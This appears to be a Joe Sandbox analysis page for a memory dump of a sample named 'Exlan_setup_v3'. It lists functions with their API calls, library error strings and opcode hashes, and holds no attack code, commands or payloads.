Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: e764d990b529e8ac1169e71353e59caa29f40efb72e593b1c4065705ed2007e4
Instruction ID: 98727996a6f91f6fb8a176d220b1678207a56d5724ffb624f2d623b6ab36ffee
Opcode Fuzzy Hash: e764d990b529e8ac1169e71353e59caa29f40efb72e593b1c4065705ed2007e4
Instruction Fuzzy Hash: 75F0B43294C711BBF721ABB89801B9D3BE47F41728F234119EA18A72C0DF649540EA7B

Function 6CFA2090 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

Part of subcall function 6CFA4010: std::_Xinvalid_argument.LIBCPMT ref: 6CFA402A

__CxxThrowException@8.LIBCMT ref: 6CFA211F

Part of subcall function 6D00AC75: RaiseException.KERNEL32(?,?,6D009C34,5A45ABCE,?,?,?,?,6D009C34,5A45ABCE,6D039C90,6D04B974,5A45ABCE), ref: 6D00ACB7

Part of subcall function 6CFA4010: std::_Xinvalid_argument.LIBCPMT ref: 6CFA4067

__CxxThrowException@8.LIBCMT ref: 6CFA21BF

Strings

PK_MessageAccumulator: DigestSize() should not be called, xrefs: 6CFA20BD
PK_MessageAccumulator: TruncatedFinal() should not be called, xrefs: 6CFA215D

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise
String ID: PK_MessageAccumulator: DigestSize() should not be called$PK_MessageAccumulator: TruncatedFinal() should not be called
API String ID: 4088727247-1268710280
Opcode ID: 8415ab9874486dd0c8354fa6f4cf7516a8af6696bb9b0bb3d267f933ab7b7675
Instruction ID: 90bd85d21ad854c35a7bc21094b306f45f413373503597cc18da358b4a4c1100
Opcode Fuzzy Hash: 8415ab9874486dd0c8354fa6f4cf7516a8af6696bb9b0bb3d267f933ab7b7675
Instruction Fuzzy Hash: 54415970C0528CFEEB01DFE9D880BEEFBB8AB19314F50422AE421A7681DB745608CF51

Function 6CFA1D30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 6CFA4010: std::_Xinvalid_argument.LIBCPMT ref: 6CFA402A

__CxxThrowException@8.LIBCMT ref: 6CFA1DC9

Part of subcall function 6D00AC75: RaiseException.KERNEL32(?,?,6D009C34,5A45ABCE,?,?,?,?,6D009C34,5A45ABCE,6D039C90,6D04B974,5A45ABCE), ref: 6D00ACB7

Part of subcall function 6CFA4010: std::_Xinvalid_argument.LIBCPMT ref: 6CFA4067

__CxxThrowException@8.LIBCMT ref: 6CFA1E74

Strings

BufferedTransformation: this object is not attachable, xrefs: 6CFA1D67
CryptoMaterial: this object contains invalid values, xrefs: 6CFA1E16

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise
String ID: BufferedTransformation: this object is not attachable$CryptoMaterial: this object contains invalid values
API String ID: 4088727247-3853263434
Opcode ID: d2769ff7fadd68f74d2adb0623556cbed4d4e6834aba5c7b484bcdb2d49fb084
Instruction ID: 9b0148aef9a25b8d83bfaf08c4161cce2bcc42ee4f6442bded721b79198db64a
Opcode Fuzzy Hash: d2769ff7fadd68f74d2adb0623556cbed4d4e6834aba5c7b484bcdb2d49fb084
Instruction Fuzzy Hash: 76413C70C05288EFEB00DFE9D880BDEFBB8EF19354F10826AE42567691DB345608CB50

Function 6CFA4010 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CFA402A

Part of subcall function 6D009125: std::exception::exception.LIBCMT ref: 6D00913A
Part of subcall function 6D009125: __CxxThrowException@8.LIBCMT ref: 6D00914F
Part of subcall function 6D009125: std::exception::exception.LIBCMT ref: 6D009160

std::_Xinvalid_argument.LIBCPMT ref: 6CFA4067

Part of subcall function 6D0090D8: std::exception::exception.LIBCMT ref: 6D0090ED
Part of subcall function 6D0090D8: __CxxThrowException@8.LIBCMT ref: 6D009102
Part of subcall function 6D0090D8: std::exception::exception.LIBCMT ref: 6D009113

Strings

invalid string position, xrefs: 6CFA4025
string too long, xrefs: 6CFA4062

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1823113695-4289949731
Opcode ID: 6ca3aa1f3c09685c271acfb6976b72f8688267b492c48a3f006782ac48628261
Instruction ID: a2d5df8240668e49e1575a0c529fcc781201c6b67358fa8a9a4a9759235d285f
Opcode Fuzzy Hash: 6ca3aa1f3c09685c271acfb6976b72f8688267b492c48a3f006782ac48628261
Instruction Fuzzy Hash: A631E833304210DBD3208E9DE840B5AFBA9EB91769F25462FE151CB781DB62984297A1

Function 6CFD6480 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6CFD6518

Part of subcall function 6D00AC75: RaiseException.KERNEL32(?,?,6D009C34,5A45ABCE,?,?,?,?,6D009C34,5A45ABCE,6D039C90,6D04B974,5A45ABCE), ref: 6D00ACB7

__CxxThrowException@8.LIBCMT ref: 6CFD6558

Strings

Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 6CFD6527
Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 6CFD64E7

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
API String ID: 3476068407-3345525433
Opcode ID: 78ddbe304f62a280f39f2a968038e2fd896d79a755274b8dd2be29ccbc8ad6a7
Instruction ID: e884cab61b6768106decf72cc1dedd6fd84a276c0293764629317b41c21b2781
Opcode Fuzzy Hash: 78ddbe304f62a280f39f2a968038e2fd896d79a755274b8dd2be29ccbc8ad6a7
Instruction Fuzzy Hash: 0421C07151C380EEE724DF64C840FDBB3E8AB4A608F564A1DE58983685EB35E0498A63

Function 6CFC5380 Relevance: 6.2, APIs: 4, Instructions: 215COMMON

Download Yara Rule

APIs

Part of subcall function 6D009BB5: _malloc.LIBCMT ref: 6D009BCF

std::exception::exception.LIBCMT ref: 6CFC5488
__CxxThrowException@8.LIBCMT ref: 6CFC549F
std::exception::exception.LIBCMT ref: 6CFC5581

Part of subcall function 6D009533: std::exception::_Copy_str.LIBCMT ref: 6D00954E

__CxxThrowException@8.LIBCMT ref: 6CFC5598

Part of subcall function 6D00AC75: RaiseException.KERNEL32(?,?,6D009C34,5A45ABCE,?,?,?,?,6D009C34,5A45ABCE,6D039C90,6D04B974,5A45ABCE), ref: 6D00ACB7

Part of subcall function 6CFD3690: _memset.LIBCMT ref: 6CFD36E3

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaise_malloc_memsetstd::exception::_
String ID:
API String ID: 2530845297-0
Opcode ID: deea22e41465a0138dee06698ff48e824b822f809ba04ae998dd3f6f5a9a9bc2
Instruction ID: 3fd8d0e5b5066af507b16c53e8eda96645d6a9b35fce882455b58fa9a3fad3d3
Opcode Fuzzy Hash: deea22e41465a0138dee06698ff48e824b822f809ba04ae998dd3f6f5a9a9bc2
Instruction Fuzzy Hash: C8714A71608605AFD704CF59D880E9AB7F8FF89314F508A6EF9558B690E730EA05CB92

Function 6CFBD4B0 Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 6D009BB5: _malloc.LIBCMT ref: 6D009BCF

std::exception::exception.LIBCMT ref: 6CFBD5E4
__CxxThrowException@8.LIBCMT ref: 6CFBD5F9
std::exception::exception.LIBCMT ref: 6CFBD608
__CxxThrowException@8.LIBCMT ref: 6CFBD61D

Part of subcall function 6D009BB5: std::exception::exception.LIBCMT ref: 6D009C04
Part of subcall function 6D009BB5: std::exception::exception.LIBCMT ref: 6D009C1E
Part of subcall function 6D009BB5: __CxxThrowException@8.LIBCMT ref: 6D009C2F

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$_malloc
String ID:
API String ID: 2621100827-0
Opcode ID: c29f9efd441db04df2ce4f0f84ddf97fdd07f075ec53c5f5ac05925e65279e92
Instruction ID: 16cf372a3a5cd676e87969083aec6cb4db6883f4a14e2fde6bfc1cb4c0daef8d
Opcode Fuzzy Hash: c29f9efd441db04df2ce4f0f84ddf97fdd07f075ec53c5f5ac05925e65279e92
Instruction Fuzzy Hash: E8517CB1A05649AFD704CFA9C980A99FBF0FF08304F54826AE518D7B41D771E914CFA1

Function 6CFC5F00 Relevance: 6.1, APIs: 4, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 6D009BB5: _malloc.LIBCMT ref: 6D009BCF

std::exception::exception.LIBCMT ref: 6CFC6035
__CxxThrowException@8.LIBCMT ref: 6CFC604A
std::exception::exception.LIBCMT ref: 6CFC6059
__CxxThrowException@8.LIBCMT ref: 6CFC606E

Part of subcall function 6D009BB5: std::exception::exception.LIBCMT ref: 6D009C04
Part of subcall function 6D009BB5: std::exception::exception.LIBCMT ref: 6D009C1E
Part of subcall function 6D009BB5: __CxxThrowException@8.LIBCMT ref: 6D009C2F

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$_malloc
String ID:
API String ID: 2621100827-0
Opcode ID: e58dd29572a41dfb517a65905d32e6742977e6b5d0fe38f5f722741b7779c7ad
Instruction ID: 4f0baec38495892efd2c756d347f29af13759aba94c2000fb98cba647b6a91a6
Opcode Fuzzy Hash: e58dd29572a41dfb517a65905d32e6742977e6b5d0fe38f5f722741b7779c7ad
Instruction Fuzzy Hash: C3516DB1A0560AAFD704CFA8C980B9AFBF4FF08304F548269E519D7B41D771E914CBA1

Function 6CFBDE50 Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CFBDE81
VariantClear.OLEAUT32(?), ref: 6CFBDF3C
VariantClear.OLEAUT32(?), ref: 6CFBDF6D
VariantClear.OLEAUT32(?), ref: 6CFBDF8B

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Variant$Clear$Init
String ID:
API String ID: 3740757921-0
Opcode ID: cd826084ad9b3ed6f250c2e6d846915fc5bb1d91045aa89f594c7503c2ded7f0
Instruction ID: fc0de938da7ebbe3e2ceb117656408b9f1faa0981e30acf20bb35c9865cd8f00
Opcode Fuzzy Hash: cd826084ad9b3ed6f250c2e6d846915fc5bb1d91045aa89f594c7503c2ded7f0
Instruction Fuzzy Hash: DB418A322092019FD700DF2AC840B9AB7E8FF99724F144A6DF944AB754D731E805CBA2

Function 6CFC5DB0 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 6D009BB5: _malloc.LIBCMT ref: 6D009BCF

std::exception::exception.LIBCMT ref: 6CFC5E87
__CxxThrowException@8.LIBCMT ref: 6CFC5E9C
std::exception::exception.LIBCMT ref: 6CFC5EAB
__CxxThrowException@8.LIBCMT ref: 6CFC5EC0

Part of subcall function 6D009BB5: std::exception::exception.LIBCMT ref: 6D009C04
Part of subcall function 6D009BB5: std::exception::exception.LIBCMT ref: 6D009C1E
Part of subcall function 6D009BB5: __CxxThrowException@8.LIBCMT ref: 6D009C2F

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$_malloc
String ID:
API String ID: 2621100827-0
Opcode ID: d77ce03aa3f0418c780968283e898747d01f4fc9b37336000469d75ed0510035
Instruction ID: 1a89de066fce60c022eb227ef4f64f60890c7cc292855df12e24ea785fc5380c
Opcode Fuzzy Hash: d77ce03aa3f0418c780968283e898747d01f4fc9b37336000469d75ed0510035
Instruction Fuzzy Hash: B1418BB19047089FE720CFA9D480B9AFBF4FB08304F40896EE54A97B41D371E604CBA1

Function 6CFBD360 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 6D009BB5: _malloc.LIBCMT ref: 6D009BCF

std::exception::exception.LIBCMT ref: 6CFBD437
__CxxThrowException@8.LIBCMT ref: 6CFBD44C
std::exception::exception.LIBCMT ref: 6CFBD45B
__CxxThrowException@8.LIBCMT ref: 6CFBD470

Part of subcall function 6D009BB5: std::exception::exception.LIBCMT ref: 6D009C04
Part of subcall function 6D009BB5: std::exception::exception.LIBCMT ref: 6D009C1E
Part of subcall function 6D009BB5: __CxxThrowException@8.LIBCMT ref: 6D009C2F

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$_malloc
String ID:
API String ID: 2621100827-0
Opcode ID: 0c5aa05d9672885a043699fc8a09f4e2b20d94846c6b438cec631b8a2fea9b3b
Instruction ID: f10f0bbec7fcb66e339b8c75b7af41a749a14f69c8a1c8354e37365f723cba58
Opcode Fuzzy Hash: 0c5aa05d9672885a043699fc8a09f4e2b20d94846c6b438cec631b8a2fea9b3b
Instruction Fuzzy Hash: 9A416AB18057489FE720CF69D480B8AFBF4FB08304F41896EE55A97B41D771E604CBA1

Function 6CFCC410 Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CFCC478
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CFCC488
SafeArrayGetElement.OLEAUT32(?,00000001,?), ref: 6CFCC4B4
SafeArrayDestroy.OLEAUT32(?), ref: 6CFCC512

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: ArraySafe$Bound$DestroyElement
String ID:
API String ID: 3987547017-0
Opcode ID: a6fcaa05c30a17e341fc15489200471b13a4f58490af8e12726b336ffcd01d18
Instruction ID: 200281575884370befc14e30dac16d59799ed48cf959082c82f6c37e9e00ca72
Opcode Fuzzy Hash: a6fcaa05c30a17e341fc15489200471b13a4f58490af8e12726b336ffcd01d18
Instruction Fuzzy Hash: 8A411B75B0014AAFDB00DF98C880EAFBBB8EB49354F20C569F919E7640D734EA45CB61

Function 6CFCB580 Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(6D0202A0), ref: 6CFCB5D5
VariantInit.OLEAUT32(?), ref: 6CFCB5E2
VariantClear.OLEAUT32(?), ref: 6CFCB685
VariantClear.OLEAUT32(6D0202A0), ref: 6CFCB68B

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: 6b14fc13630f1d2ec8742d878e112eb26fff16a5c7e52ba80d8bffc77706ddf5
Instruction ID: ce80d0658d807a1bfb027f93578257dcb4879939d86ef306e7804238441b4ff0
Opcode Fuzzy Hash: 6b14fc13630f1d2ec8742d878e112eb26fff16a5c7e52ba80d8bffc77706ddf5
Instruction Fuzzy Hash: 19418176A05209EFDB00DFA9C980B9AF7F9FF89314F2445A9E904A7350D736E901CB90

Function 6CFA5A30 Relevance: 6.1, APIs: 4, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 6D009BB5: _malloc.LIBCMT ref: 6D009BCF

std::exception::exception.LIBCMT ref: 6CFA5ACB
__CxxThrowException@8.LIBCMT ref: 6CFA5AE0
std::exception::exception.LIBCMT ref: 6CFA5B18
__CxxThrowException@8.LIBCMT ref: 6CFA5B2D

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

